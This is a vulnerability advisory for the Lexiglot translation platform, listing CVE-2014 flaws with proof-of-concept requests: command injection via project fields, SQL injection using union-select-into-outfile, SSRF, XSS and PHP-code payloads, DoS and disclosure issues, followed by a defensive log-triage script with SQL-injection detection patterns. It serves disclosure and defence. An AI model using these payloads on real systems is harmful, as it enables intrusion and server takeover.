JAHx181 - Piwigo lexiglot multiple vulnerabilities
This advisory somehow slipped between the cracks, but hey, 4 years late is better than never...right?
About
Lexiglot is a translation platform for PHP projects developed in PHP. -- http://piwigo.org/translate
Command injection
CVE-2014-8945
The username and password fields are vulnerable to command injection when adding a new project.
POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1
name=test%7Cid&svn_url=http%3A%2F%2Fhost%3A8888%2Ftest%7Cid&svn_user=test%7Cid&svn_password=test%7Cid&files=1%2C2%2C3&rank=1&category_id=&add_project=Add
HTTP/1.1 200 OK
string(53) "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
SQL Injection
CVE-2014-8941
There are several SQL injection vulnerabilities in the project.
~# curl 'http://192.168.58.134/vvv/lexiglot/admin.php?page=users&from_id=-1"+union+select+"abc"+into+outfile+"/tmp/winrar"+--+-'
POST /vvv/lexiglot/admin.php?page=history HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415751084-sV2wWGNLwVjAwGDxwhXcw4oemS8%3D; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=jqnd14cvtvddkf99t8d18ikr17
user_id=-1&language=-1&project=-1&status=-1&limit=1'&search=Search
Cross site request forgery
CVE-2014-8942
The SQL injection described above can also be triggered through cross-site request forgery.
Server side request forgery
CVE-2014-8943
The "add a project" page requests the URL supplied as the SVN repository in order to verify that it is a valid SVN repository; an attacker can abuse this to make the server issue requests on their behalf.
POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1
name=test&svn_url=http%3A%2F%2Fhost%3A8888%2F&svn_user=test&svn_password=test&files=test&rank=1&category_id=&add_project=Add
HTTP/1.1 200 OK
string(132) "svn: OPTIONS of 'http://host:8888': Could not read status line: connection was closed by server (http://host:8888)"
Cross site scripting
CVE-2014-8944
There are both persistent and reflected XSS vulnerabilities in this project:
Reflected: Login with username a"><script>alert(1)</script>
Persistent: Through configuration interface, the install_name, intro_message and new_file_content parameters:
POST /vvv/lexiglot/admin.php?page=config HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 435
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php?page=config
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415755982-4D8DIXhWWhJEXJnq8Z%2BmNBJ%2BhSQ%3D; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=v97mnbctl9hlkc0564cgu7r034
X-FirePHP: 0.4.4
X-FirePHP-Version: 0.4.4
X-Wf-Max-Combined-Size: 262144
install_name=Lexiglot<script+src=xss>&intro_message=Welcome+on+your+new+installation+of+Lexiglot%21<script+src+xss2>&default_language=en_UK&var_name=lang&use_stats=1&use_talks=1&access_to_guest=1&allow_registration=1&allow_profile=1&user_can_add_language=1&user_default_language=own&user_default_project=all&language_default_user=all&project_default_user=all&new_file_content=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%2F%2FWAT&save_config=Save
Denial of service
CVE-2014-8937
The api/update.php URL is publicly accessible and runs svn update on every registered project, which consumes significant resources and ties up a web server thread. Multiple simultaneous requests to this URL cause resource exhaustion and render the web server inaccessible.
Local credential disclosure
CVE-2014-8938
The svn update function executes with username and password as command line arguments. In shared environments other users may be able to obtain these credentials by running the ps command:
~# ps auxw | grep svn
www-data 27662 0.0 0.4 12792 3548 ? S 20:17 0:00 svn checkout http://host:8888/ ./local/test --revision HEAD --username test --password test
Local path disclosure
CVE-2014-8939
The local filesystem path is disclosed by the following URL if PHP is configured to display warnings: include/smarty/plugins/modifier.date_format.php
Information disclosure
CVE-2014-8940
An attacker can access the /update.log URL to view all projects that have been updated. This can be used to leverage the aforementioned DoS attack or to browse repository code, as the projects are checked out to /local/projectname. Example:
~# GET http://localhost/vvv/lexiglot/update.log | head -1
[2014-11-08T11:58:10+01:00] rotateimage
~# GET http://localhost/vvv/lexiglot/local/rotateimage | head -10
<title>Index of /vvv/lexiglot/local/rotateimage</title>
<img src="/icons/folder.gif" alt="[DIR]"> <a href="ar_SA/">ar_SA/</a>
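A defender-side triage script, added here and not part of the advisory or of Lexiglot, that scans web server access-log lines for the request patterns described above: bursts against the unauthenticated api/update.php endpoint, reads of update.log and the /local/ checkout directory, and SQL keywords or non-integer values in the integer parameters of admin.php. The log lines, IPs, category names and the burst threshold are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')  # Apache-style line
SQLI_RE = re.compile(r"union\s+select|into\s+outfile", re.I)
NUMERIC_PARAMS = {"from_id", "limit", "user_id", "project", "language", "status"}  # integer fields used by the PoCs
UPDATE_BURST_THRESHOLD = 3  # assumed: requests per client to api/update.php before alerting
# Constructed sample lines (not from the advisory); IPs and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Nov/2014:11:58:10 +0100] "GET /vvv/lexiglot/api/update.php HTTP/1.1" 200 12
10.0.0.5 - - [08/Nov/2014:11:58:10 +0100] "GET /vvv/lexiglot/api/update.php HTTP/1.1" 200 12
10.0.0.5 - - [08/Nov/2014:11:58:11 +0100] "GET /vvv/lexiglot/api/update.php HTTP/1.1" 200 12
10.0.0.7 - - [08/Nov/2014:12:01:02 +0100] "GET /vvv/lexiglot/update.log HTTP/1.1" 200 340
10.0.0.7 - - [08/Nov/2014:12:01:05 +0100] "GET /vvv/lexiglot/local/rotateimage/ HTTP/1.1" 200 1200
10.0.0.9 - - [08/Nov/2014:12:03:00 +0100] "GET /vvv/lexiglot/admin.php?page=users&from_id=-1%22+union+select+%22abc%22+into+outfile+%22/tmp/x%22+--+- HTTP/1.1" 200 500
10.0.0.9 - - [08/Nov/2014:12:03:30 +0100] "GET /vvv/lexiglot/admin.php?page=history&limit=1%27 HTTP/1.1" 200 500
"""

def classify(line):
    """Return (client, [categories]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path, hits = url.path.lower(), []
    if path.endswith("/update.log") or "/local/" in path:
        hits.append("info-disclosure")      # CVE-2014-8940: log and checkout dir exposed
    if path.endswith("/api/update.php"):
        hits.append("update-endpoint")      # CVE-2014-8937: unauthenticated svn update
    if path.endswith("/admin.php"):
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:            # parse_qs has already URL-decoded the value
                if SQLI_RE.search(value):
                    hits.append("sqli-pattern")        # CVE-2014-8941
                elif key in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
                    hits.append("sqli-non-numeric")    # quote or junk in an integer field
    return m["ip"], hits

def triage(log_text):
    """Return (client, category) findings; update.php hits are reported only as bursts."""
    findings, update_hits = [], Counter()
    for ip, hits in filter(None, map(classify, log_text.splitlines())):
        for cat in hits:
            if cat == "update-endpoint":
                update_hits[ip] += 1
            else:
                findings.append((ip, cat))
    findings += [(ip, "update-burst") for ip, n in update_hits.items() if n >= UPDATE_BURST_THRESHOLD]
    return findings
```

POST bodies, which carry the command injection and the history-page injection, never reach an access log, so those require application-level or WAF logging; this script covers only what the web server itself records.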
Solution
Upgrade to the latest version or seek an alternative, as the vendor deemed some of these issues acceptable.